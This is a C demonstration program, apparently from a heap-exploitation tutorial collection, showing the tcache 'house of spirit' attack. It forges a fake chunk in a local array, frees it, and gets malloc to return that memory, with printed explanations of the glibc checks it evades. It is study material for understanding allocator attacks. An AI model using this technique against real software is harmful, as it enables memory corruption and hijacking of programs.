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tcache_house_of_spirit.c
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#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
int main()
{
setbuf(stdout, NULL);
printf("This file demonstrates the house of spirit attack on tcache.\n");
printf("It works in a similar way to original house of spirit but you don't need to create fake chunk after the fake chunk that will be freed.\n");
printf("You can see this in malloc.c in function _int_free that tcache_put is called without checking if next chunk's size and prev_inuse are sane.\n");
printf("(Search for strings \"invalid next size\" and \"double free or corruption\")\n\n");
printf("Ok. Let's start with the example!.\n\n");
printf("Calling malloc() once so that it sets up its memory.\n");
malloc(1);
printf("Let's imagine we will overwrite 1 pointer to point to a fake chunk region.\n");
unsigned long long *a; //pointer that will be overwritten
unsigned long long fake_chunks[10]; //fake chunk region
printf("This region contains one fake chunk. It's size field is placed at %p\n", &fake_chunks[1]);
printf("This chunk size has to be falling into the tcache category (chunk.size <= 0x410; malloc arg <= 0x408 on x64). The PREV_INUSE (lsb) bit is ignored by free for tcache chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
printf("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
fake_chunks[1] = 0x40; // this is the size
printf("Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
printf("... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
a = &fake_chunks[2];
printf("Freeing the overwritten pointer.\n");
free(a);
printf("Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
void *b = malloc(0x30);
printf("malloc(0x30): %p\n", b);
assert((long)b == (long)&fake_chunks[2]);
}